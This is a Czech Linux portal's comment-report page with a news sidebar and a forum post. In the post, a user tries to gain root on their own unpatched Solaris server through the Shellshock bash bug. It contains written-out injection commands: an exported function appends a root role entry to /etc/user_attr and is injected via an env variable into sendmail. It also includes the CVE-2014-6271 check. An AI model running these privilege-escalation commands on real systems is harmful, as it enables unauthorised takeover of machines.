Inzerujte na AbcPráce.cz od 950 Kč

napište » Zprávičky

včera 19:55 | Zajímavý software

Uživatelé mobilních telefonů s Linuxem si nyní mohou nainstalovat aplikaci Mobilní Datovka. Díky tomu je přístup k datovým schránkám dostupný i na zařízeních s mobilními linuxovými distribucemi, jako jsou například Mobian, NixOS Mobile, pmOS atd. Aplikace je dostupná na Flathubu.

David Heidelberg | Komentářů: 0

Doporučení SFC pro používání generativní AI při přispívání do FOSS

včera 13:33 | Komunita

Software Freedom Conservancy v novém dokumentu shrnuje doporučení, jak přistupovat ke generativní AI založené na LLM při přispívání do svobodného a open-source softwaru. Mimo jiné vyzývá k obezřetnosti, transparentnosti a revizi generovaného kódu člověkem.

|🇵🇸 | Komentářů: 7

darktable 5.6.0

včera 13:22 | Nová verze

Byla vydána nová verze 5.6.0 programu na úpravu digitálních fotografií darktable (Wikipedie).

Ladislav Hagara | Komentářů: 0

Týden v GNOME a Týden v KDE Plasma (20. června 2026)

20.6. 20:11 | Komunita

Na čem aktuálně pracují vývojáři GNOME a KDE Plasma? Pravidelný přehled novinek v Týden v GNOME a Týden v KDE Plasma. V Týdnu v GNOME je zmíněn flatpak balíček pro GIMP 0.54.1 z roku 1996. Jedná se o poslední verzi GIMPu postavenou nad toolkitem Motif.

Ladislav Hagara | Komentářů: 0

Home Assistant Operating System 18.0

20.6. 19:11 | Nová verze

Home Assistant Operating System, tj. linuxová distribuce optimalizována pro hostování Home Assistanta a jeho aplikací, byl vydán v nové major verzi 18.0.

Ladislav Hagara | Komentářů: 1

Z jádra Linux byla odstraněna funkce strncpy()

20.6. 18:11 | Komunita

Po šestiletém úsilí byla z jádra Linux odstraněna funkce strncpy(). Všechna předchozí volání této funkce byla převedena na bezpečnější alternativy.

Ladislav Hagara | Komentářů: 1

systemd 261

20.6. 17:22 | Nová verze

Byla vydána nová verze 261 správce systému a služeb systemd (Wikipedie, GitHub). Z novinek lze vypíchnout nový subsystém IMDS (Cloud "Instance Metadata Service"), nový příkaz storagectl nebo novou komponentu systemd-sysinstall.

Ladislav Hagara | Komentářů: 6

Qt Creator 20

20.6. 12:00 | Nová verze

Vývojové prostředí Qt Creator bylo vydáno ve verzi 20 (seznam změn). Novinky zahrnují hlavně rozšíření pro integraci LLM agentů nebo minimalistický editační režim uživatelského rozhraní („zen mode“).

|🇵🇸 | Komentářů: 0

Simulátor letu v Google Earth

19.6. 10:22 | Humor

Už jste se prolétli na webu Google Earth? Přibyl tam Simulátor letu (Nástroje / Simulátor letu). Funguje i bez účtu Google [𝕏].

Ladislav Hagara | Komentářů: 1

Godot 4.7

19.6. 09:55 | Nová verze

Byla vydána nová verze 4.7 (𝕏, Bluesky, Mastodon) multiplatformního open source herního enginu Godot (Wikipedie, GitHub). Přehled novinek i s náhledy v příspěvku na blogu.

Ladislav Hagara | Komentářů: 3

Centrum | Napsat | Starší

navrhněte » Anketa

Komentářů: 30, poslední 3.4. 20:20

Rozcestník

AbcLinuxu

HDmag.cz

Administrace komentářů

Jste na stránce určené pro řešení chyb a problémů týkajících se diskusí a komentářů. Můžete zde našim administrátorům reportovat špatně zařazenou či duplicitní diskusi, vulgární či osočující příspěvek a podobně. Děkujeme vám za vaši pomoc, více očí více vidí, společně můžeme udržet vysokou kvalitu AbcLinuxu.cz.

Příspěvek

13.5.2016 15:08 chcisezeptat
Rozbalit Rozbalit vše Re: shellshock - jak hacnout sám sebe

Jako řekl bych že můj systém není zaplátovaný viz nějaké info úplně dole. Navíc se mě podařilo nasimulovat prolomení SSH ForceCommandu, takže jsem byl schopen získat plnohodnotný shell bohužel pod uživatelem pod kterým jsme se přihlásil...

Napsal jsem si funkci a exportoval ji do shellu:

$ injection() {
>         echo "user::::type=role" >> /etc/user_attr
> }
$ export -f injection

Teď se snažím z mého shellu spustit další shell pod rootem a z něj pomocí parsovacího bugu spustit funkci, bohužel se mi nedaří:

user@server-to-hack:~$ env asd='() { :;}; injection ' /usr/lib/sendmail
env asd='() { :;}; injection ' /usr/lib/sendmail
Recipient names must be specified
^C
user@server-to-hack:~$ env asd='() { :;}; injection ' /usr/lib/sendmail user
env asd='() { :;}; injection ' /usr/lib/sendmail user

nic se nestane...

Kdyby měl někdo nějaký další tip budu moc rád. S přístupem do serverovny se to má prostě tak, že zákazník vyhodil všechny lidi co tam měli povolen přístup a teď už cca půl roku "řeší" jak vyměnit to ILO. Je to prostě klasický bordel, předpokládám že někteří z vás ví očem tady píšu... Hacknout ten server z localhostu je pro mě asi opravdu nejrychlejší řešení. :)

---

To check for the CVE-2014-6271 vulnerability

user@server-to-hack:~$ env var='() { ignore this;}; echo vulnerable' bash -c /bin/true
vulnerable

---

user@server-to-hack:~$ bash --version
bash --version
GNU bash, version 4.1.11(2)-release (sparc-sun-solaris2.11)

---

Publisher: solaris
       Version: 0.5.11 (Oracle Solaris 11.1 SRU 1.4)
 Build Release: 5.11
        Branch: 0.175.1.1.0.4.0
Packaging Date: November  6, 2012 12:13:44 AM

---

user@server-to-hack:~$ X='() { (a)=>\' bash -c "echo date"
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'

user@server-to-hack:~$ cat echo
Friday, May 13, 2016 03:51:13 PM EEST

V tomto formuláři můžete formulovat svou stížnost ohledně příspěvku. Nejprve vyberte typ akce, kterou navrhujete provést s diskusí či příspěvkem. Potom do textového pole napište důvody, proč by měli admini provést vaši žádost, problém nemusí být patrný na první pohled. Odkaz na příspěvek bude přidán automaticky.

Offtopic diskuse použijte pro diskusi mimo záběr našeho portálu (včelařství, windows), která by měla být smazána.
Duplicitní diskuse je určena pro případ, kdy uživatel odeslal svůj dotaz několikrát.
Návrh na cenzuru použijte, pokud komentář obsahuje urážky, vulgarismy nebo porušuje zákony.
Návrh na smazání komentáře je velmi neobvyklá akce používaná obvykle při nepovolené reklamě či spamu, výkřicích psychicky nemocných jedinců (ještírci) nebo pro smazání duplikátních komentářů.
Oprava formátování je žádost pro úpravu formy příspěvku, například pokud někdo píše bez odstavců nebo použije PRE pro celý komentář. Žádosti o změnu obsahu budou zamítnuty.

Vaše jméno
Váš email
Typ požadavku

Slovní popis